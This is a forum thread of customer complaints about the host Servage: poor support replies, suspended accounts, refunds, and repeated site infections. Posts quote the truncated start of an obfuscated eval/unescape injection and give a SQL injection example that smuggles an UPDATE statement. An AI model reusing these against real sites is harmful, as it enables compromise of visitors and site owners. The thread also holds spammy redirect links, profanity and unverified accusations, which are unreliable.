Your answer is a Joke. The Domain which have the Traffic is xxxxx.com.
This Domain is not hosted by Servage. Check the Whois on http://www.betterwhois.com/
and you will see that there are no Nameservers from Servage but the growing of traffic
doesnt stop. For a Domain which is not HOSTED BY YO
—————————————————————————–
2008-11-26 03:35
Customer
Also try to open the Site in the Browser and you will see that the Site doesnt exist.
So how it can be that the traffic actual grows there.
—————————————————————————–
2008-11-26 14:37
Customer
Half Day no answers. Thats a real great Service
2008-11-28 08:43
Servage – Sam
Hello xxx,
Due to the clustered structure of our systems there is no single log file for
you to use as your site is served by many servers. For statistic purposes we
recommend using the statistic system which is pre-installed in the control panel.
We are continue working to improve this system.
Thank you for your understanding,
Kind Regards
Sam, Support
Servage Hosting
—————————————————————————–
2008-11-28 21:24
Customer
After more as 2 Days I get a answer.
But a answer which have nothing real to
do with the Problem.
Fact is you have
suspend our Account abaout a Highload
from a Domain which was in the past hosted
by you. The the traffic grow allways but
only by you. There where is the Domain
real hosted is no one Problem. This what
you call Support does my Grandma with her
79 Years do better.
Frank that has to be stupid & funny at the same time. So far it’s the worst answer I’d seen from their support line.
Sorry for the problems you have though…
Well like many before me here, spoken to SERVAGE now with my feet, have given them notice that I’m off, and could not recommend that any one deals with this company. I’ve had enough now and will not go through any more their CS BS!
New problem on Servage
After upgrading the cluster WordPress not working correctly.
Google site map generator for WP do not generate site map automaticaly. Only by manual. It looks like word press do not ping the goole after upgrading. Before upgrading all worked fine.
Have you tried contacting support ? Paste their reply’s here, We’d like to see what stupid answers they’ve got for you
Servage replay
I attempted to create a sitemap.xml from http://www.xxxxxxxxx.info/wp-admin/ but I guess it needs a paid subscription. May I have a valid username for this? Also please note that the xml files have been disabled in new server configuration. But in order to solve all these issues our admin is replacing the new server environment as earlier.
On tomorrow onwards everything will be back to work.
Thank you.
———————–
Dear Julie
Google site map plugin for WP is a free plugin. Today I moove one of my sites to ipowerweb.com and do not have any problems. If the problem not resolved I need to moove all my sites to another hosting company. Please resolve problem ASAP.
“xml files have been disabled in new server configuration” – ???
I think that the problem can be on it. But if it is disabled how can i create sitemap in manual mode?
—————————
I can understand your situation. Please wait for some time until we fix all the issues at a time.
————————–
Kindly check now , I believe sitemap should work now.
————————–
Thank you for your help. But, unfortunately, sitemap generator is not working. You can check it by yourself. Sorry, but I am disappointed.
Your server configuration not working correctly with WP. Please resolve the problem!!!
————————–
Hello Mikhaylo,
Can you please contact with wordpress, so that you can get the hints for solving the issue?
—————————
????????
Is it a joke?
I know 2 things.
1.Old (standard) server configuration worked perfectly.
2.You have made changes in the server configuration and programs no longer work correctly.
Is this my problem? This is your problem. Programs do not work not only on my account, programs not working on the accounts of other users. I have heard complaints from other users that the new server configuration does not work correctly.
Please return to the previous configuration of the server and everything should work properly.
I am not a programer – I am a user. I do not know how to formulate a question. You have a problems. You must communicate with the WP to solve the problem. If you can not do this I move my sites to another hosting company.
By the way, one site I have moved and I do not any problem with this site. The problems only on your hosting.
—————————-
Hello Mikhaylo,
I am sorry for the delay. The issue has been fixed but you need to reinstall the wordpress to get an updated sitemap as some version of files have been changed in the new server.
—————————
I instal NEW WP with new DB. I instal NEW wersion of google site map generator. But, unfortunately, sitemap generator is not working. You can check it by yourself.
acces to site
xxxxxxxxxxxxx
xxxxxxxxxxxxx
—————————–
Hello Mikhaylo,
We will fix the issue for you but before that kindly provide us the steps to replicate the problem.
—————————-
I do not know how to solve this problem. Before upgrading the cluster everything worked well.
—-
PS. Today I move my site to another hosting and do not have a problrms
thanks for sharing with us Mikle, as usual, Servage support is useless.
Hi guys, in the last few days my account on servage was hacked too, I had around 1000 lines of links on my homepage. I complained & at once they denied it has anything to do with them, i ask them to check the server logs as a ftp was created too – ‘we cannot do this as the files are served on a cluster’. Idiots!
Moving to MediaTemple, heard there a great deal better than these cowboys.
hello: thanks for this discussion as servage is the abso-freeking-lutely worst hosts I have ever seen. (even though I myself have not been at this for very long but it seemed to work ok at servage when i first started a little over a year ago)
does anyone know where is there any EU or Canada hosting that allows adult and (legit) viagra cialis levitra male – men’s health meds sites?
for me too it has to be NON-USA because there are so many fricking moralistic attorneys general and police assholes in various states in the USA that go after porn sites when their citizens complain.(and not expensive for add-on shared domain hosting)
meanwhile….those dudes are complete lying jerks
“sucks big assholes” Connect me over ICQ 265917221. I can tell you a Hoster
Frank you can post it here
It is special for Adult Hosting.Very secure and
with a great Service. Also if you like to have
additional futures you can speak with them and discuss
over the Price. I get all there what I like.
I dont post the Link direct I use a Redirect Service:
http://xirox.us/go/5GkmE
Is anybody found some viruses after claster upgrade?
The same story happened to me today. It seems to be a never ending story ?!. And Servage answered again and again:
Hello,
Thank you for submitting a ticket. Please remove all the effected contains from your websites. To prevent the issue happen in future please take the following measures.
->Please set the files and folders permission to 644 and 755 respectively.
->Please give a strong password in your control panel as well as in your FTP accounts.
->Please restrict your FTP accounts.
->Please upgrade your third party scripts to their latest and stable versions.
Thank you!!
Kind Regards
Patrik, Support
Servage Hosting
I think all of their clusters get hacked periodically, but it’s just a few of us that noticed it and googled it.
Same problem for me and all my websites hosted by Servage. I don’t know if it’s a rootkit or a trojan, it’s only shit!
Only the index files were affected (.php o .html) by the javascript code. I’ve tried to set 600 files permission, and if they got hacked and it means that it’s ONLY a servage fault.
Servage answer:
We are sorry for the inconvenience faced by you.
We will require the assistance of our system administrator’s to get this issue resolved. We do apologize for the inconvenience this may have brought; we will get this matter resolved as soon as possible. We thank you for your patience and understanding.
Till the moment we will suggest you to please check the IP of who has accessed via following link:
https://secure.servage.net/admin/?menuHeader=3&menuSub=7&page=accounting_security
You can block any IP address via .htaccess file from your control panel. You need to add the following code in .htaccess file:
order allow,deny
deny from xxx.xx.x.x
deny from xxx.xx.x.
allow from all
You can replace xxx.xx.x.x with the IP you want.
(Sorry for my english)
(sorry for my english)
SERVAGE has got hacked again. I have many websites and all the htm, html and php sites have this crap in it!!
window['eAvsaslq'.replace(/[su&Aq]/g, ”)](window['eAvsaslq'.replace(/[su&Aq]/g, ”)](‘u|n5e|s|c_a+p5e(‘.replace(/[\+\|5\(_]/g, ”))(‘%…….
Some have even more to it!!
I am looking at a new host, any suggestions>?
Servage changed their OS and I could not even get my site loading (ssl dedicated), for days they kept saying it was up but when I checked the domain ssl version it was running via a proxy – ssl terminate, and that proxy was up and down like a yoyo.
The responses from their service staff were absolute rubbish.
After two weeks I had to move it, live customers and all, now I can’t even get my money back as I paid in advance by paypal, I lodged a dispute at paypal, but still they didn’t even bother to respond.
Without shadow of a doubt I will never use this company again. In addition to the above, I checked my sites and they were all hacked, some deep in the core php files, and people were logging on from somewhere in poland and creating their own ftp accounts (!!!!!)
They are pretty stupid. I warning servage on the first days of 2008 about the serious problem on their server but they answer to me with very stupid arguments. So, if you wanna protect your script/database, DON’T USE SERVAGE.NET!!
I love them.They will never understand
anything.
Dear XXXXXXXXX,
This is Steffan from Servage Hosting again. I can see that you were
once a Servage customer therefore I would like to take this
opportunity give you a great new years offer!
For a limited time we offer a 30% discount to all users (also your friends!!)
using this coupon code when signing up: MEGA1210
This offer includes:
* 30% discount (the entire life of your account!)
* 510 GB Diskspace
* 5010 GB Transfer/month
* Free Domain!
* And all other features included in our normal package
More information regarding on the package:
http://www.servage.net/?coupon=MEGA1210
You can find all package details and ordering details at our site
http://www.servage.net. Please note that the discount will be first be
subtracted during the ordering process.
We hope that you will return to Servage Hosting today or know someone
who would like to take advantage of the great offer!
If you have any questions please contact sales@servage.net.
Did I mention that you are also welcome to give the coupon to
your friends?
Best regards,
Steffan, http://www.servage.net
Frank, I just received the same offer
) It’s hilarious 
)
With their answers it is reasonable to believe hacking is one of benefits they offer…. no one report it? Do they even read their tickets?
Really, it is clever to stay AWAY FROM SERVAGE as far as you can….
Btw. I’m still waiting a respond about my refond too.
Stay away from servage!! Their server are good for hacking only. The support give stupid answer quickly. I can have the same answer with a random phrases generator. STAY AWAY!!
Nice to see im not the only one getting this inserted into my sites! Id also keep an eye on any .js files as I have found similaer code put into them. Ayone no any good alternative to them BTW?
I think it’s not a problem with servage or any other hosting. Your PC is infected with the trojan horse or something.
I have three websites at three different hostings. Today all my index(php and html) were all modified , an iframe was inserted into them all. Whenever a user tried to reach my site, the trojan would infect the user’s pc too.
My PC is infected and it somehow got all the user/pass of my hosting accounts. So all the accounts at THREE different hosts got infected at the same time.
@ drukpa
w/ all due respect drukpa, you may indeed have the infections on your computer, but when it comes to servage you don’t know what you’re talking about.
some of us use unix, linux, other os that are not windoze and it’s the stupid fucks at servage that also allow their servers to get hacked every other fricking day.
do a little research before you blab about something you don’t know anything about.
google has blocked/warned about thousands of sites hosted on servage that are malware infected sites.
your pc being infected is not the same as an iframe injection.
servage is run by a bunch of incompetent pimple faced druggies and hackers — aparently with the same level of technical knowledge as some posters who still defend those sorry lame ass fucks.
[...] kann nur sagen Finger weg von dem Hoster. Zu dem Sicherheits Problem bei Servage gibt es auch hier http://www.proxyutza.com/exploit-ifr…jan-infection/ sehr interessante Informationen. [...]
Jeez guys, this is NOT and I repeat NOT a service provider issue. I’ve been on so many forums and seen the same old shit about this virus.
Whats happening here is that on your local PC you have a virus thats sniffing your FTP password when you upload new scripts / HTML files etc to your website. The passwords are ending up on a server I’ve traced to the Ukraine, where your sites HTML and PHP files anre having the virus script injected into them.
Within a few hours, your site is now acting as a distribution node for the virus.
The only solution I have founf so far is to re-upload fresh copies of your sites files from backups (virus free ones) and then change the FTP password from your providers control panel.
This way at least your sites are safe.
I’ve set up a completely fresh machine to make site changes now and all seems to be OK. I’ve had tno re-infections.
The trouble is that no one as far as I can tell, has clearly identified the virus to be able to disinfect it from your local machine. Some people are identifying it as GUMBLAR but the script charicteristics vary so widely that I suspect we are dealing with a wide range of copycats.
Maybe the only way to track it down is to use something like Ethereal to sniff FTP sessions and see whats going on.
Whatever it is, this virus is a pain of the greatest magnitude,. But dont give your service provider hell. Its not theiir fault. 100%.
Dave, in our case, with Servage hosting it’s definitely not a local problem.
It’s their servers & staff who are to blaim
My servage account was today hacked by NobodyCoder@mail.ru all my sites changed, massive loss of earnings, seriously considering changing providers!
Recently i signed up with Servage.net for hosting and domain name registration.
I paid with a creditcard and recieved an autometed email informing me that my order would be processed within 30 minutes.
24 hours later, having received no confirmation i sent an email to sales@servage.net asking for the status of my order.
No reply.
I sent another email to sales and also info@servage.net.
No reply.
I tried to cancel my order but the credit card company told me the oayment had been taken.
Using my right under Servage.net’s published terms and conditions I sent an email requesting cancellation of my account within the first 5 days.
No reply. I tried to login
with my username and password. Account not activated.
I sent another email repeating my request for a refund and asking for a resolution to the issue.
No reply.
Servage.net simply took my money and ignored my emails.
I call that theft.
Avoid servage.net
Use a different hosting firm or registrar.
If everything happened as stated above, you should be able to file a complaint and your credit card company should refund you the money, and next they should try and recover the money from servage.
The original issue on this thread of tags being inserted into web pages, sounds like a SQL Injection attack. This is where SQL in included in a form variable/query string and then incorporated into server script dynamic SQL statements, e.g.
querystring UserID=”1;update categories set title=’…’;”
causing the following sql to be created and run:
“select * from atable where UserID=1;update categories set title=’…’;”
If you then use the category titles when you build your page, your users get the script in their browser.
It may also be possible to update the file system from within the SQL statement by running shell commands, or using export functions of the database.
This is a common attack and form/querystring data must be cleaned to prevent it.
Normally I would only expect one account to be effected but if an account with sufficient privileges is effected, the whole server could be infected.
(and before you ask, they don’t need to know the table/column names, they just guess likely names and keep trying until they get a result.)
Hope this helps,
Matt.
obviously I was talking about script tags above, but I used less than/greater than signs so it got filtered (rather than html encoded which is what I do with comments)…
Also, don’t migrate to HostDept. They are just as bad as Servage.
We all know al about that. BUT that DOES NOT explain the constant hacking of Servage sites, the stealing of personal credit/ debit card details and the total lack of support from the clowns that run it. If you like Servage then good luck to you. If you ever ahve a problem with any aspect of their service and then try and get it resolved then you might realise why so many people run away from them and why so many people think they should be closed down for good. Judge for yourself.
I’ve only just found this, but over 10 times, mostly concentrated in the period mentioned by the poster, malicious code was inserted into all sites hosted with Servage.
They blamed it on my using ‘old scripts with risks’ and said no other user had complained.
I’m moving all my accounts now, I’m decided (all my sites are down today; thanks servage!)… Can anyone recommend a good, HONEST alternative to the lying Germans?
Servage hosts many Porn sites, I’m not an expert but it seems Servage seems particularly, prone to such attacks. I closed my account with them many moons ago, mainly due to their banal, and patronising CS. They are obviously making way too much money to care about posters such as yourself and many 100′s of others, yes they are very complacent. Depending on the content I find 1 and 1 has grown into s more, well much more scripts, also much more control over individual choices regarding a shared hosting account than a few years ago. They are reliable, CS is A1, not cheap (unless your have an address in the US), but you get what you pay for as our grandparents always remind us of lol.
Well just hours after I posted this, it seems Servage is down and so is the email.
Or so I thought.
Doing a traceroute it seems they are up and running absolutely fine from everywhere… except my office IP!
I assume they have blocked out of spite due to my earlier comments, has anyone else experienced this sort of action?